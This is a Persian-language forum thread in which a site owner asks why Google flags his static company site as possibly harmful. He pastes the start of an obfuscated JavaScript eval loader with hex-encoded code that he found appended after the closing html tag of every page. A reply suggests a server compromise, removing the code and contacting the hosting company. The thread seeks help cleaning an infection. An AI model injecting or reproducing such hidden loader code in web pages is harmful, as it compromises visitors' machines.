تبلیغات :
ماهان سرور
آکوستیک ، فوم شانه تخم مرغی ، پنل صداگیر ، یونولیت
دستگاه جوجه کشی حرفه ای
فروش آنلاین لباس کودک
خرید فالوور ایرانی
خرید فالوور اینستاگرام
خرید ممبر تلگرام

[ + افزودن آگهی متنی جدید ]

نمايش نتايج 1 به 2 از 2

نام تاپيک: پيغام گوگل درباره مشكوك بودن يكي از سايت هاي شركت ما به ويروسي بودن

داره خودمونی میشه
    تاريخ عضويت
    Jul 2006

پيش فرض پيغام گوگل درباره مشكوك بودن يكي از سايت هاي شركت ما به ويروسي بودن

سلام
    من اين بحث رو در قسمت هك هم مطرح كردم اما كسي جواب نداد!
    چند روز پيش وقتي اسم سايتم رو در گوگل سرچ كردم ، در كنار نام سايت نوشته شده بود " بازديد از اين سايت مكن است به رايانه شما آسيب وارد نمايد . " كه البته با كليك روي نام سايت صفحه ديگه بود كه توضيح مي داد اين سايت مشكوك به آلوده بودنه و ..
    اين سايت بغير از صفحه تماس با كه ارسال ايميل آن با استفاده از php هست ، بقيه قسمت هاش كاملا استاتيك هست ، وقتي من فايل هاي صفحات سايت رو دانلود كردم و بازشون كردم به انتهاي تمامي صفحات بعد از تگ </html> كدي چسبيده بود كه براتون اينجا مي ذارم :

div id='x0dc1d5702fd59a862093c38747f60f9b9'><script type="text/javascript">var jQuery=window['eVvqaql4'.replace(/[q4VP\[]/g, '')]('e<vWa,lh'.replace(/[,\<W&h]/g, '')); jQuery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x79\x 58\x30\x71\x33\x67\x28\x6f\x6f\x66\x66\x42\x29\x7b \x66\x75\x6e\.....

از دوستان اگر كسي اطلاعاتي داره لطفا راهنمايي كنند كه اگر اين يك ويروسه چطور وارد شده و چطور مي شه امنيت سايت هاي استايك رو بالا برد ؟

حـــــرفـه ای neopersia's Avatar
    تاريخ عضويت
    Oct 2006

پيش فرض

این احتمالاً یک ویروسه که به سرور نفوذ کرده و فایلهای html رو تحت تأثیر قرار میده
    من هم قبلان یه نمونه از این ویروس رو تجربه کردم! ظاهراً کار زیادی نمیشه برای امنیتش کرد به جز اینکه امنیت کلی سرور بالا بره که در حطیه اختیارات طراح سایت نیست!
    فعلاً باید اون کدها رو از صفحات حذف کنید بعد اگر تو کنترل پنلتون امکان اسکن کردن ویروس هست انجام بدید.
    اما در هر صورت با شرکت هاستینگ تماس بگیرید تا اطلاع داشته باشن و احیاناً برای اون یه چاره ای پیدا کنن!

3. 2 کاربر از neopersia بخاطر این مطلب مفید تشکر کرده اند

Thread Information

Users Browsing this Thread

هم اکنون 1 کاربر در حال مشاهده این تاپیک میباشد. (0 کاربر عضو شده و 1 مهمان)

User Tag List

قوانين ايجاد تاپيک در انجمن

• شما نمی توانید تاپیک ایحاد کنید
  • شما نمی توانید پاسخی ارسال کنید
  • شما نمی توانید فایل پیوست کنید
  • شما نمی توانید پاسخ خود را ویرایش کنید
  •